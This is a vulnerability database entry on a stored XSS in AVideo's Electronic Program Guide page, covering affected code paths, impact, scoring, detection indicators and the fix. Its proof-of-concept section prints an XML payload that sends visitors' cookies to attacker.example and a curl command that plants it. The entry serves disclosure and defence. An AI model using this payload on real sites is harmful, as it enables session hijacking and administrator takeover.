
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-39367 is a stored Cross-Site Scripting (XSS) vulnerability in WWBN AVideo's Electronic Program Guide (EPG) feature that allows an authenticated user with upload permissions to inject malicious JavaScript into the public EPG page, affecting all unauthenticated visitors. It affects AVideo versions 26.0 and prior (composer package wwbn/avideo). The vulnerability was published on April 7, 2026, with a patch commit available shortly after. It carries a CVSS v3.1 base score of 5.4 (Medium) (Github Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and spans three files in the data flow. First, objects/videoAddNew.json.php (lines 117–119) stores the epg_link parameter with only a URL format check, requiring only basic upload permission (User::canUpload()). Second, objects/EpgParser.php (line 321) extracts programme titles from the XML as raw strings with no sanitization. Third, plugin/PlayerSkins/epg.php (lines 343–351) interpolates these titles directly into HTML output without htmlspecialchars() or any escaping — enabling both HTML injection and HTML attribute injection depending on the display width. Notably, channel display names are sanitized via safeString(), but programme titles are not, indicating an oversight. The rendered output is also cached server-side (ObjectYPT::setCache at line 634), meaning the XSS payload persists even if the malicious XML source is later removed (Github Advisory, AVideo Security Advisory).
Successful exploitation enables session hijacking of any visitor to the public EPG page, including administrators, as their session cookies are exfiltrated via the injected JavaScript. Stolen admin sessions grant full platform control, enabling account takeover and unauthorized content manipulation. The attack has a wide blast radius because the EPG page requires no authentication, the payload is server-side cached, and it fires for every subsequent visitor without further attacker interaction (Github Advisory).
No public proof-of-concept exploit code beyond the PoC included in the GitHub Security Advisory itself has been reported, and there is no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.029–0.034%, placing it in the 10th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires only low-privilege upload access to the target AVideo instance, lowering the barrier for abuse (Github Advisory).
User::canUpload()) permissions — administrator access is not required.<title> element using a CDATA section:<?xml version="1.0" encoding="UTF-8"?>
<tv>
<channel id="ch1"><display-name>Test Channel</display-name></channel>
<programme start="20260404060000 +0000" stop="20260404070000 +0000" channel="ch1">
<title><![CDATA[<img src=x onerror=fetch('https://attacker.example/steal?c='+document.cookie)>]]></title>
</programme>
</tv>videoAddNew.json.php with the epg_link parameter pointing to the attacker-hosted XML:curl -s -b 'PHPSESSID=UPLOAD_USER_SESSION' \
'https://target.example/objects/videoAddNew.json.php' \
-d 'title=LiveStream&videoLink=https://example.com/stream.m3u8&epg_link=https://attacker.example/evil.xml&categories_id=1'EpgParser.php fetches and parses the malicious XML, and epg.php injects the unsanitized title into HTML. The result is cached server-side.https://target.example/plugin/PlayerSkins/epg.php triggers the XSS, exfiltrating their session cookies to the attacker's server. Admin cookies enable full platform takeover (AVideo Security Advisory).attacker.example/steal?c=) originating from the EPG page./objects/videoAddNew.json.php with an epg_link parameter pointing to an external or suspicious XML URL; server-side HTTP requests to external XML sources initiated by the EPG parser.ObjectYPT::setCache) containing raw <img>, <script>, or onerror HTML tags within programme title fields — inspect the EPG cache files for unsanitized HTML.epg_link field points to an external or unexpected URL hosting an XML file; EPG XML files containing CDATA sections with JavaScript or HTML event handlers in <title> elements (AVideo Security Advisory).The fix is implemented in commit e0212add4aad0f1e97758a4b4fdc57df58ce68e8, which applies htmlspecialchars($program['title'], ENT_QUOTES, 'UTF-8') to programme titles before HTML interpolation in plugin/PlayerSkins/epg.php. Administrators should upgrade AVideo to a version incorporating this patch (beyond 26.0). As interim mitigations: restrict upload permissions to trusted users only, audit existing epg_link values in the database for suspicious external XML URLs, and clear the server-side EPG cache to remove any persisted XSS payloads. Additionally, consider adding input sanitization at parse time in EpgParser.php for defense in depth (Github Advisory, Patch Commit).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."